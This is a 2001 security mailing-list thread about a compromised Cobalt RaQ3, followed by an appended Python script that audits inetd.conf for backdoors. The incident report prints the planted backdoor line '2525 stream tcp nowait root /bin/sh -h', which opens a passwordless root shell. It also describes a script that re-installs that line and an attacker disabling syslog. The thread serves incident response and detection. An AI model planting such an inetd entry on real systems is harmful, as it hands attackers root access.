
Re: [cobalt-security] [RaQ3] Hacked ... a summary



Ports 7937, 7938 and 617 are for Legato and Arkeia backups.
To close them, check Legato and Arkeia in the CP and save changes;
after this, uncheck the two and save again.

This closes the ports (until reboot).

RB

----- Original Message -----
From: "Michael Stauber" <michael@xxxxxxxxxxxxxx>
To: <cobalt-security@xxxxxxxxxxxxxxx>
Sent: Wednesday, March 14, 2001 5:31 AM
Subject: [cobalt-security] [RaQ3] Hacked ... a summary


> Hello,
>
> My RaQ3 has also been hacked, apparently with the DNS exploit posted earlier
> on this list.
>
> When I scanned for open ports I found the following unusual ones open:
>
> 2525 - unknown
> 7937 - unknown
> 7938 - unknown
>
> 2525 was neat. It came from an entry inetd.conf:
>
> 2525 stream tcp nowait root /bin/sh -h
>
> So there was the root backdoor without password.
>
> Still unclear are the ports 7937 and 7938. Does anyone know what they're
> used for? They seem to be commonly used on RaQ3's.
>
> Due to the time and date when inetd.conf was modified I was able to find
> out when the box was hacked. Unfortunately the hacker apparently shut the
> syslog facility down while he was in, so for the next 20 minutes after his
> login there were no logfiles.
>
> /root/.bash_history showed some interesting entries which were not from
> me, so the attacker did not clean up properly. There was an nslookup on the
> domain "soultwins.com" and named.conf had been opened with "vi".
> Additionally, the DNS file of a virtual site had been opened in "vi" as
> well. No changes were visible in either file, though.
>
> A search for fishy cronjobs turned up blank, but a search for executable
> files with uid 0 revealed that there was a /usr/bin/bd, which was a
> shell script which upon execution edits inetd.conf to re-insert the
> backdoor at port 2525 <groan>.
>
> Since then telnet has been disabled on the site, ssh enabled, and
> additionally I run both logcheck and portsentry from http://psionic.com,
> tools which I can highly recommend.
>
> Portsentry watches for portscans, and if one is detected the IP address of
> the scanning client is permanently blocked from accessing the box.
>
> Logcheck checks the system logs for unusual events. Bind it to a cronjob
> and you get emailed once an unusual event or obvious traces of an attack
> are found.
>
> Still, I'd really appreciate it if someone could share the knowledge of
> what ports 7937 and 7938 are for on a RaQ3.
>
> Thanks!
>
> --
>
>
> Mit freundlichen Grüßen / Best regards
>
> Michael Stauber
>
> _______________________________________________
> cobalt-security mailing list
> cobalt-security@xxxxxxxxxxxxxxx
> http://list.cobalt.com/mailman/listinfo/cobalt-security
>
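As an added example (not part of the original thread and not code from either poster), here is a small inetd.conf audit in the spirit of Michael's findings: it parses the classic `service type proto wait user server args` layout and flags entries like `2525 stream tcp nowait root /bin/sh -h`, so that a re-insertion by something like the described /usr/bin/bd script is caught on the next run. The sample config, the list of "known" services and the shell paths are constructed assumptions.

```python
from typing import List, NamedTuple, Tuple

# Constructed assumptions: services a stock RaQ3-era inetd.conf would normally carry,
# and the interpreters that should never appear as an inetd server program.
KNOWN_SERVICES = {"ftp", "telnet", "finger", "pop-3", "imap", "shell", "login"}
SHELLS = {"/bin/sh", "/bin/bash", "/bin/csh", "/bin/tcsh", "/bin/ksh"}

class InetdEntry(NamedTuple):
    service: str      # service name from /etc/services, or a bare port number
    socket_type: str  # stream / dgram
    protocol: str     # tcp / udp
    wait: str         # wait / nowait
    user: str         # account inetd runs the server as
    server: str       # program path
    args: List[str]   # argv as written in the file

def parse_inetd_conf(text: str) -> List[InetdEntry]:
    """Parse inetd.conf text; comments and malformed (short) lines are skipped."""
    entries = []
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 6:
            continue
        entries.append(InetdEntry(*fields[:6], fields[6:]))
    return entries

def suspicious_reasons(entry: InetdEntry) -> List[str]:
    """Return the reasons an entry looks like a backdoor (empty list if it looks normal)."""
    reasons = []
    if entry.server in SHELLS:
        reasons.append("server program is an interactive shell")
    if entry.service.isdigit():
        reasons.append("service given as a bare port number")
    if entry.user == "root" and entry.service not in KNOWN_SERVICES:
        reasons.append("runs as root for an unrecognised service")
    return reasons

def audit_inetd_conf(text: str) -> List[Tuple[InetdEntry, List[str]]]:
    """All entries that trigger at least one reason, with their reasons."""
    flagged = []
    for entry in parse_inetd_conf(text):
        reasons = suspicious_reasons(entry)
        if reasons:
            flagged.append((entry, reasons))
    return flagged

# Constructed sample: three ordinary entries plus the backdoor line quoted in the thread.
SAMPLE_INETD_CONF = """\
# /etc/inetd.conf (constructed sample)
ftp     stream  tcp  nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp  nowait  root    /usr/sbin/tcpd  in.telnetd
finger  stream  tcp  nowait  nobody  /usr/sbin/tcpd  in.fingerd
2525 stream tcp nowait root /bin/sh -h
"""

if __name__ == "__main__":
    for entry, reasons in audit_inetd_conf(SAMPLE_INETD_CONF):
        print(f"{entry.service}/{entry.protocol} -> {entry.server}: {', '.join(reasons)}")
```

Run it from cron against the live /etc/inetd.conf (or diff its output against a known-good copy) to notice the backdoor returning even when logging has been shut off.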